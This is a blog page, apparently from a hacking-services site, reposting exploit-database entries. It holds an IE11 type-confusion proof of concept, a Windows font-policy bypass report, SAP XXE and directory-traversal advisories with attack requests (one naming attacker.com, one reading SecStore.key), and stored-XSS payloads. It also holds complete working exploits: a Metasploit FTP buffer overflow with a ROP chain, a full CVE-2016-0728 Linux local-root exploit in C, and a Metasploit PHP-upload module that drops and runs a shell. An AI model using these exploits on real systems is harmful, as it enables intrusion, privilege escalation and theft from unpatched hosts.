Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863106137

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
<!--
CVE-2016-0199 / MS16-063: MSIE 11 garbage collector attribute type confusion
============================================================================
This information is available in an easier to read format on my blog at
http://blog.skylined.nl/

With [MS16-063] Microsoft has patched [CVE-2016-0199]: a memory
corruption bug
in the garbage collector of the JavaScript engine used in Internet
Explorer 11.
By exploiting this vulnerability, a website can causes this garbage
collector
to handle some data in memory as if it was an object, when in fact it
contains
data for another type of value, such as a string or number. The garbage
collector code will use this data as a virtual function table (vftable)
in order
to make a virtual function call. An attacker has enough control over
this data
to allow execution of arbitrary code.

Known affected software and attack vectors
------------------------------------------
+ **Microsoft Internet Explorer 11** (all versions before the June 2016
patch)

  An attacker would need to get a target user to open a specially crafted
  webpage. Disabling JavaScript should prevent an attacker from
triggering the
  vulnerable code path.

Repro
-----
I've created two separate html files that can be used to reproduce this
issue
and shows control over a 32-bit vftable pointer in x86 versions of MSIE or a
partial control over a 64-bit vftable pointer in x64 versions.
-->

<!DOCTYPE html>
<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
  oElement = document.createElement("IMG");
  var oAttr = document.createAttribute("loop");
  oAttr.nodeValue = oElement;
  oElement.loop = 0x41424344; // Set original value data to 44 43 42 41
  oElement.setAttributeNode(oAttr); // Replace oElement with original value data
  oElement.removeAttributeNode(oAttr);
  CollectGarbage(); // Use original value data as address 0x41424344 of a vftable
</script>

<!--
(I've had to use xcript rather than script because Gmail refused to send it
otherwise, see https://support.google.com/mail/answer/6590 for the reason.)

Description
-----------
When `setAttributeNode` is used to set an attribute of a HTML element,
and the
`Attr` node's `nodeValue` is not a valid value, this `nodeValue` is set
to the
value the attribute had before the call. This can happen for instance
when you
try to set an attribute that must have a string or number value by using an
`Attr` node with a HTML element as its `nodeValue` (as this is not a
string or
number). The HTML element in `nodeValue` is replaced with the string or
number
value the attribute had before the call to `setAttributeNode`.

If the `Attr` node is then removed using `removeAttributeNode` and the
garbage
collector runs, the code appears to assume the nodeValue still contains an
object, rather than the string or number it has been changed into. This
causes
the code to use the data for the string or number value as if it was a C++
object. It attempts to determine a function pointer for a method from the
object's virtual function table before calling this function using the
pointer.

If the previous value is a string, the character data from the string is
used
to calculate the function pointer. If the previous value is a number,
the value
of the number is used. This provides an attacker with a large amount of
control
over the function pointer and may allow execution of arbitrary code.

Scanner
-------
I build a "scanner" to analyze this issue and help create two
proof-of-concept
files that show control over the vftable pointer. More details and the
source
for these can be found on my blog at http://blog.skylined.nl.
-->
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=779

Windows: Custom Font Disable Policy Bypass
Platform: Windows 10 Only
Class: Security Feature Bypass

Summary:
It’s possible to bypass the ProcessFontDisablePolicy check in win32k to load a custom font from an arbitrary file on disk even in a sandbox. This might be used as part of a chain to elevate privileges. If anything this is really a useful demonstration that you probably really want to shutdown the object manager directory shadowing as part of the sandbox mitigations, even if you don’t fix the explicit bypass.

Description:

The Process Mitigation policy ProcessFontDisablePolicy disables loading fonts from memory or by a path other than in the system fonts directory. This is probably mostly redundant with the introduction of the User Mode Font Driver, although there’s some interesting additional attack surface if you could compromise that process (it is running with a locked down DACL to prevent people attacking it, presumably). Also while UMFD runs in an AppContainer it might be less restrictive than other sandboxes providing a limited sandbox escape (again to just open up additional attack surface).

The issue is due to a race condition in the check which looks similar to the following:

int WIN32K::bLoadFont(...) {
  int load_option = GetCurrentProcessFontLoadingOption();
  bool system_font = true;
  if (load_option) {
    HANDLE hFile = hGetHandleFromFilePath(FontPath); <- First open of path
    BOOL system_font = bIsFileInSystemFontsDir(hFile); <- Should return True
    ZwClose(hFile);
    if (!system_font) {
      LogFontLoadAttempt(FontPath);
      if (load_option == 2)
        return 0;
    }
  }
  // Switch out path here
  HANDLE hFont = hGetHandleFromFilePath(FontPath); <- Will open our custom font
  // Map font as section
}

There’s a clear race between opening the font and checking its location and then re-opening it again to map the file as a section for processing. If you could make the first check open a file in the system font directory then it’d pass the check. If you then switch out the font for your custom one it’ll load that instead. Previously I’d do this using symbolic links, such as mount points or object manager links but that’s pretty much no longer available in sandboxes anymore. So instead I’ve abused object manager directory shadows again. You can construct a native NT path in such a way that it will first open a system font file, then using a oplock to win the race we can switch the directory object to point to our custom font on disk.

Note: I effectively presented this at the Troopers conference and even said how I did it so this is sort of been publicly disclosed. But that was using object manager symbolic links, and due to the way the font files are loaded this wasn’t usable in a sandbox due to it opening the files at kernel privilege. I pointed out to the attendees that I didn’t think it was easy to exploit in a sandbox so it wasn’t a problem. I’ve spoke to Gavin Thomas about this, he wanted the PoC sending even if unexploitable. As this seems to be more of a problem thought I’d send into secure@.

Proof of Concept:

I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low.

1) Extract the PoC to a location on a local hard disk which is writable by a low IL user. This is necessary as the PoC needs to copy a font file to the applications directory. You also need a copy the pacifioc.ttf font file into the same directory.
2) Execute the poc executable file as low integrity.

Expected Result:
It shouldn’t be possible to load a custom font from disk if it’s outside of the system font location.

Observed Result:
The font is loaded and can be used with GDI.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39993.zip
HireHackking 
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver  AS JAVA 7.1 - 7.5

Vendor URL: http://SAP.com

Bug: XXE

Sent:  20.10.2015

Reported: 21.10.2015

Vendor response: 21.10.2015

Date of Public Advisory: 08.03.2016

Reference: SAP Security Note 2235994

Author:  Vahagn Vardanyan  (ERPScan)



Description


1. ADVISORY INFORMATION

Title: [ERPSCAN-16-013] SAP NetWeaver  AS  Java ctcprotocol servlet –
XXE vulnerability

Advisory ID: [ERPSCAN-16-013]

Risk: Medium

Advisory URL: https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/

Date published: 08.03.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: XXE

Impact: denial of service

Remotely Exploitable: Yes

Locally Exploitable: No

CVE-2016-3974


CVSS Information

CVSS Base Score v3:  6.4  / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) High (H)

PR : Privileges Required (Level of privileges needed to exploit) High (H)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality High (H)

I : Impact to Integrity High (H)

A : Impact to Availability High (H)



3. VULNERABILITY DESCRIPTION

Authorized attacker can use a special request to read files from the
server and then escalate his or her privileges.



4. VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.1 - 7.5

Other versions are probably affected too, but they were not checked.


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2235994



6. AUTHOR

Vahagn Vardanyan  (ERPScan)


7. TECHNICAL DESCRIPTION


An XML external entity (XXE) vulnerability in the Configuration Wizard
in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial
of service, conduct SMB Relay attacks, or access arbitrary files via a
crafted XML request related to the ctcprotocol servlet.

PoC


POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
Content-Type: text/xml

<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
 <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
  <url>attacker.com</url>
 </m:XXX>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>




8. REPORT TIMELINE

Sent:  20.10.2015

Reported: 21.10.2015

Vendor response: 21.10.2015

Date of Public Advisory: 08.03.2016




9. REFERENCES

https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/


10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of
ERPScan, which is engaged in vulnerability research and analysis of
critical enterprise applications. It has achieved multiple
acknowledgments from the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud to have exposed new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
nominated for the best server-side vulnerability at BlackHat 2013.

ERPScan experts have been invited to speak, present, and train at 60+
prime international security conferences in 25+ countries across the
continents. These include BlackHat, RSA, HITB, and private SAP
trainings in several Fortune 2000 companies.

ERPScan researchers lead the project EAS-SEC, which is focused on
enterprise application security research and awareness. They have
published 3 exhaustive annual award-winning surveys about SAP
security.

ERPScan experts have been interviewed by leading media resources and
featured in specialized info-sec publications worldwide. These include
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
Heise, and Chinabyte, to name a few.

We have highly qualified experts in staff with experience in many
different fields of security, from web applications and
mobile/embedded to reverse engineering and ICS/SCADA systems,
accumulating their experience to conduct the best SAP security
research.



11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Security provider. Founded in 2010, the company operates globally and
enables large Oil and Gas, Financial and Retail organizations to
secure their mission-critical processes. Named as an ‘Emerging Vendor’
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
distinguished by 30+ other awards, ERPScan is the leading SAP SE
partner in discovering and resolving security vulnerabilities. ERPScan
consultants work with SAP SE in Walldorf to assist in improving the
security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions to evaluate and secure SAP
and Oracle ERP systems and business-critical applications from both,
cyber-attacks as well as internal fraud. Usually our clients are large
enterprises, Fortune 2000 companies and managed service providers
whose requirements are to actively monitor and manage security of vast
SAP landscapes on a global scale.

We ‘follow the sun’ and function in two hubs, located in the Palo Alto
and Amsterdam to provide threat intelligence services, agile support
and operate local offices and partner network spanning 20+ countries
around the globe.
HireHackking 
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver  AS JAVA 7.1 - 7.5

Vendor URL: http://SAP.com

Bug: Directory traversal

Sent:  29.09.2015

Reported: 29.09.2015

Vendor response: 30.09.2015

Date of Public Advisory: 08.03.2016

Reference: SAP Security Note 2234971

Author:         Vahagn Vardanyan  (ERPScan)




Description


1. ADVISORY INFORMATION

Title: [ERPSCAN-16-012] SAP NetWeaver AS Java directory traversal vulnerability

Advisory ID: [ERPSCAN-16-012]

Risk: medium

Advisory URL: https://erpscan.com/advisories/erpscan-16-012/

Date published: 08.03.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: directory traversal

Impact: remotely read file from server

Remotely Exploitable: Yes

Locally Exploitable: No

CVE-2016-3976


CVSS Information

CVSS Base Score v3:  7.5  / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) None (N)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity None (N)

A : Impact to Availability None (N)



3. VULNERABILITY DESCRIPTION

An authorized attacker can use a special request to read files from
the server and then escalate his or her privileges.




4. VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.1 - 7.5

Other versions are probably affected too, but they were not checked.


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2234971



6. AUTHOR

Vahagn Vardanyan  (ERPScan)



7. TECHNICAL DESCRIPTION

An attacker can use an SAP NetWeaver function CrashFileDownloadServlet
to read files from the server.


PoC


GET /XXX/CrashFileDownloadServlet?fileName=..\security\data\SecStore.key


Disclaimer: According to the partnership agreement between ERPScan and
SAP, our company is not entitled to publish any detailed information
about detected vulnerabilities before SAP releases a patch. After the
release, SAP suggests respecting an implementation time of three
months and asks security researchers to not to reveal any details
during this time. However, In this case, the vulnerability allows an
attacker to read arbitrary files on a remote server, possibly
disclosing confidential information, and many such services are
exposed to the Internet. As responsible security researchers, ERPScan
team made a decision not to disseminate the full PoC even after the
specified time.



8. REPORT TIMELINE

Send: 29.09.2015

Reported: 29.09.2015

Vendor response: 30.09.2015

Date of Public Advisory: 08.03.2016




9. REFERENCES

https://erpscan.com/advisories/erpscan-16-012/


10. ABOUT ERPScan Research

The company’s expertise is based on the research subdivision of
ERPScan, which is engaged in vulnerability research and analysis of
critical enterprise applications. It has achieved multiple
acknowledgments from the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud to have exposed new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
nominated for the best server-side vulnerability at BlackHat 2013.

ERPScan experts have been invited to speak, present, and train at 60+
prime international security conferences in 25+ countries across the
continents. These include BlackHat, RSA, HITB, and private SAP
trainings in several Fortune 2000 companies.

ERPScan researchers lead the project EAS-SEC, which is focused on
enterprise application security research and awareness. They have
published 3 exhaustive annual award-winning surveys about SAP
security.

ERPScan experts have been interviewed by leading media resources and
featured in specialized info-sec publications worldwide. These include
Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
Heise, and Chinabyte, to name a few.

We have highly qualified experts in staff with experience in many
different fields of security, from web applications and
mobile/embedded to reverse engineering and ICS/SCADA systems,
accumulating their experience to conduct the best SAP security
research.



11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Security provider. Founded in 2010, the company operates globally and
enables large Oil and Gas, Financial and Retail organizations to
secure their mission-critical processes. Named as an ‘Emerging Vendor’
in Security by CRN, listed among “TOP 100 SAP Solution providers” and
distinguished by 30+ other awards, ERPScan is the leading SAP SE
partner in discovering and resolving security vulnerabilities. ERPScan
consultants work with SAP SE in Walldorf to assist in improving the
security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions to evaluate and secure SAP
and Oracle ERP systems and business-critical applications from both,
cyber-attacks as well as internal fraud. Usually our clients are large
enterprises, Fortune 2000 companies and managed service providers
whose requirements are to actively monitor and manage security of vast
SAP landscapes on a global scale.

We ‘follow the sun’ and function in two hubs, located in the Palo Alto
and Amsterdam to provide threat intelligence services, agile support
and operate local offices and partner network spanning 20+ countries
around the globe.
HireHackking 
# Exploit Title: Radiant CMS 1.1.3  - Mutiple Persistant XSS Vulnerabilities
# Exploit Author: David Silveiro 
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro 
# Vendor Homepage: http://radiantcms.org/
# Software Link: http://radiantcms.org/download/
# Date: Zero day

Radiant is a no-fluff, open source content management system designed for small teams. It is similar to Textpattern or MovableType, but is a general purpose content management system (not just a blogging engine) written in Ruby.

Stored XSS 1 – File Title Upload

The attacker must first be a user of sorts, as there's only 2 types of roles 'administrator' & 'designer' we're going with the assumption of the latter. Now as the designer we have the option to upload 'assets' such as files or images, here lyes one of the issues.

When uploading, we're presented with the option to create a title for an image, which gets displayed back in the general repository where a user logged  in as admin would also be able to see it. We're able to input our own javascript within this field, thus when a you then visit the 'assets' page, you will be presented with a pop up.

Enter the example below.

POC:

Title: </script>alert('XSS')</script>


Stored XSS 2 – User Personal Preferences

This time round were faced with a lot more avenues to have our JS displayed back to us. Again, we're going with the assumption that we're logged in as a designer user.

Let us navigate to the 'Settings page', where you'll see  2 options to edit Personal Preferences & Configuration, click on Edit Prefrences.

POC:

Name: <script>alert('XSS 1')</script>
Email Address: <script>alert('XSS2')</script>@gmail.com
Username: <script>alert('XSS3')</script>

This will not only reflect back to you, as the designer, but also the back to the admin when he/she goes onto the http://127.0.0.1/admin/users/ and is presented with our users malicious 'NAME' parameter.
HireHackking 
# Exploit Title: YetiForce CRM < 3.1  - Persistant XSS Vulnerability
# Exploit Author: David Silveiro 
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro 
# Vendor Homepage: https://yetiforce.com/
# Software Link: http://sourceforge.net/projects/yetiforce/
# Date: Fixed on 20th June 2016

YetiForce CRM was built on a rock-solid Vtiger foundation, but has hundreds of changes that help to accomplish even the most challenging tasks in the simplest way

YetiForce is vulnerable to a stored XSS vulnerability present within a users comment section.

POC:

Within 'Companies & Accounts > Accounts' select your prefered user, and then in the 'Comments' section input;

<img src=x onerror=alert('XSS');>

Either refresh the current page, or navigate back to 'Accounts'
HireHackking 
=begin
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 22-06-2016
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Exploit Author: quanyechavshuo
# Contact: quanyechavshuo@gmail.com
# Website: http://xinghuacai.github.io
# Category: ftp remote exploit

1. Description
this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from
    https://www.exploit-db.com/exploits/39662/

use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address

=end

##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking
    
      include Msf::Exploit::Remote::Ftp
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'PCMAN FTP Server Buffer Overflow - ls Command',
          'Description'    => %q{
              This module exploits a buffer overflow vulnerability found in the PUT command of the
              PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
              credientials are enabled.
          },
          'Author'         =>
              [
                'quanyechavshuo'
              ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'EDB',   '39662'],
              [ 'OSVDB',   'N/A']
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'process'
            },
          'Payload'        =>
            {
              'Space'   => 1000,
              'BadChars'  => "\x00\x0A\x0D",
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'windows 7 x64 chinese',
                {
                #'Ret' => 0x77636aeb, #dont need ret here in win7 
                  'Offset' => 2008
                }
              ],
            ],
          'DisclosureDate' => 'Aug 07 2015',
          'DefaultTarget'  => 0))
      end
    
      def check
        connect_login
        disconnect
    
        if /220 PCMan's FTP Server 2\.0/ === banner
          Exploit::CheckCode::Appears
        else
          Exploit::CheckCode::Safe
        end
      end

  def create_rop_chain()
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x77032c3b,  # POP EAX # RETN [kernel32.dll] 
      0x41414141,  # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
      0x73c112d0,  # ptr to &VirtualProtect() [IAT OLEACC.dll]
      0x76bb4412,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll] 
      0x76408d2a,  # XCHG EAX,ESI # RETN [SHLWAPI.dll] 
      0x76b607f0,  # POP EBP # RETN [msvcrt.dll] 
      0x74916f14,  # & push esp # ret  [RICHED20.dll]
      0x7368b031,  # POP EAX # RETN [COMCTL32.dll] 
      0xfffffaff,  # Value to negate, will become 0x00000201
      0x756c9a5c,  # NEG EAX # RETN [SHELL32.dll] 
      0x767088bd,  # XCHG EAX,EBX # RETN [RPCRT4.dll] 
      0x77031d7b,  # POP EAX # RETN [kernel32.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x76cc4402,  # NEG EAX # RETN [SHELL32.dll] 
      0x76b4ad98,  # XCHG EAX,EDX # RETN [SHELL32.dll] 
      0x756b1cc1,  # POP ECX # RETN [SHELL32.dll] 
      0x7647c663,  # &Writable location [USP10.dll]
      0x73756cf3,  # POP EDI # RETN [COMCTL32.dll] 
      0x76cc4404,  # RETN (ROP NOP) [USER32.dll]
      0x76b3f5d4,  # POP EAX # RETN [msvcrt.dll] 
      0x90909090,  # nop 
      0x7366e16f,  # PUSHAD # RETN [COMCTL32.dll] 

    ].flatten.pack("V*")

    return rop_gadgets

  end


      def exploit
        connect_login
    
        print_status('Generating payload...')
        sploit = rand_text_alpha(target['Offset'])
    
        #tmp = sploit
        #print_status(tmp)
        sploit << create_rop_chain()
        #sploit << make_nops(9) 这句产生的nop并非90
        sploit << "\x90"*30
        #sploit << "\x41"*30
        #sploit << "\xcc"
        sploit << payload.encoded
    
        #tmp=sploit
        tmp=make_nops(9)
        print_status(tmp)
    
        send_cmd( ["ls", sploit], false )
        disconnect
      end
    
    end
HireHackking 
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/

/* CVE-2016-0728 local root exploit
   modified by Federico Bento to read kernel symbols from /proc/kallsyms
   props to grsecurity/PaX for preventing this in so many ways

   $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall
   $ ./cve_2016_072 PP_KEY */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>

#include <sys/ipc.h>
#include <sys/msg.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff810bb050)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)



struct key_type {
    char * name;
        size_t datalen;
        void * vet_description;
        void * preparse;
        void * free_preparse;
        void * instantiate;
        void * update;
        void * match_preparse;
        void * match_free;
        void * revoke;
        void * destroy;
};

/* thanks spender - Federico Bento */
static unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[256];
    int ret;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        fprintf(stdout, "Unable to obtain symbol listing!\n");
        exit(0);
    }

    ret = 0;
    while(ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr);
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    return 0;
}

void userspace_revoke(void * key) {
        commit_creds(prepare_kernel_cred(0));
}

int main(int argc, const char *argv[]) {
    const char *keyring_name;
    size_t i = 0;
        unsigned long int l = 0x100000000/2;
    key_serial_t serial = -1;
    pid_t pid = -1;
        struct key_type * my_key_type = NULL;

        struct {
        long mtype;
        char mtext[STRUCT_LEN];
    } msg = {0x4141414141414141, {0}};
    int msqid;

    if (argc != 2) {
        puts("usage: ./keys <key_name>");
        return 1;
    }

        printf("[+] uid=%d, euid=%d\n", getuid(), geteuid());
    commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");
    if(commit_creds == NULL || prepare_kernel_cred == NULL) {
        commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;
                prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;
                if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)
                    puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source");
    }

        my_key_type = malloc(sizeof(*my_key_type));

        my_key_type->revoke = (void*)userspace_revoke;
        memset(msg.mtext, 'A', sizeof(msg.mtext));

        // key->uid
        *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
        //key->perm
        *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

        //key->type
        *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

        if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
               perror("msgget");
            exit(1);
        }

        keyring_name = argv[1];

    /* Set the new session keyring before we start */

    serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
    if (serial < 0) {
        perror("keyctl");
        return -1;
        }

    if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
        perror("keyctl");
        return -1;
    }


    puts("[+] Increfing...");
        for (i = 1; i < 0xfffffffd; i++) {
            if (i == (0xffffffff - l)) {
                   l = l/2;
                    sleep(5);
            }
            if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
                    perror("[-] keyctl");
                    return -1;
            }
        }
        sleep(5);
        /* here we are going to leak the last references to overflow */
        for (i=0; i<5; ++i) {
            if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
                    perror("[-] keyctl");
                    return -1;
            }
        }

        puts("[+] Finished increfing");
        puts("[+] Forking...");
        /* allocate msg struct in the kernel rewriting the freed keyring object */
        for (i=0; i<64; i++) {
            pid = fork();
            if (pid == -1) {
                    perror("[-] fork");
                    return -1;
            }

            if (pid == 0) {
                    sleep(2);
                    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                        perror("[-] msgget");
                        exit(1);
                    }
                    for (i = 0; i < 64; i++) {
                        if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                                perror("[-] msgsnd");
                                exit(1);
                        }
                    }
                    sleep(-1);
                    exit(1);
            }
        }

        puts("[+] Finished forking");
        sleep(5);

        /* call userspace_revoke from kernel */
        puts("[+] Caling revoke...");
        if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
            perror("[+] keyctl_revoke");
        }

        printf("uid=%d, euid=%d\n", getuid(), geteuid());
        execl("/bin/sh", "/bin/sh", NULL);

        return 0;
}
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

    def initialize
    super(
      'Name'           => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a file upload vulnerability in Wolfcms
        version 0.8.2. This application has an upload feature that 
        allows an authenticated user with administrator roles to upload 
        arbitrary files to the '/public' directory.
      },
      'Author'         => [
        'Narendra Bhati', # Proof of concept
        'Rahmat Nurfauzi' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-6568'], 
          ['CVE', '2015-6567'],
          ['OSVDB','126852'],          
          ['EDB', '38000'],
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Wolfcms <= 0.8.2', {}]
        ],
      'DisclosureDate' => 'Aug 28 2015',
      'Privileged'     => false,      
      'DefaultTarget' => 0
    )

    register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']),
          OptString.new('USER', [true, 'User to login with', '']),
          OptString.new('PASS', [true, 'Password to login with', '']),
        ], self.class)
    end
  
  def login
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri, "/?/admin/login/login/"),
      'vars_post' => {
          "login[username]" => datastore['USER'],
          "login[password]" => datastore['PASS'],
          "login[redirect]" => "/wolfcms/?/admin"
      }
    })
    return res
  end

  def exploit

    upload_name = rand_text_alpha(5 + rand(5)) + '.php'

    get_cookie = login.get_cookies
    cookie = get_cookie.split(";")[3]

    token = send_request_cgi({
      'method' => 'GET',
      'cookie' => cookie,
      'uri'    => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/")     
    })

    html = token.body
    if html =~ /Files/
      print_status("Login successfuly")
    end
    csrf_token = html.scan(/<input\s*id=\"csrf_token\"\s*name=\"csrf_token\"\s*type=\"hidden\"\s*value=\"(.*)"/).last.first

    boundary = Rex::Text.rand_text_hex(28)

    data = "-----------------------------#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"csrf_token\"\r\n"
    data << "\r\n"
    data << csrf_token
    data << "\r\n"
    data << "-----------------------------#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"upload[path]\"\r\n\r\n"
    data << "/"
    data << "\r\n"
    data << "-----------------------------#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"upload_file\"; filename=\"#{upload_name}\"\r\n"
    data << "Content-Type: text/x-php\r\n"
    data << "\r\n"
    data << payload.encoded
    data << "\r\n"
    data << "-----------------------------#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"commit\"\r\n"
    data << "\r\n"
    data << "Upload\r\n"
    data << "-----------------------------#{boundary}--\r\n\r\n"

    print_good("#{peer} - Payload uploaded as #{upload_name}")

    res = send_request_cgi({
      'method' => 'POST',    
      'data'  => data,
      'headers' =>
      {
        'Content-Type'   => 'multipart/form-data; boundary=---------------------------' + boundary,
        'Cookie'   => cookie,
      },
      'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/")     
    })
    
    register_file_for_cleanup(upload_name)

    print_status("#{peer} - Executing shell...")

    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "public",upload_name),
    })
   
  end    
end
HireHackking 
# Exploit Title: Magnet Networks – Weak WPA-PSK passphrases used in Tesley CPVA 642 Router
# Google Dork: 
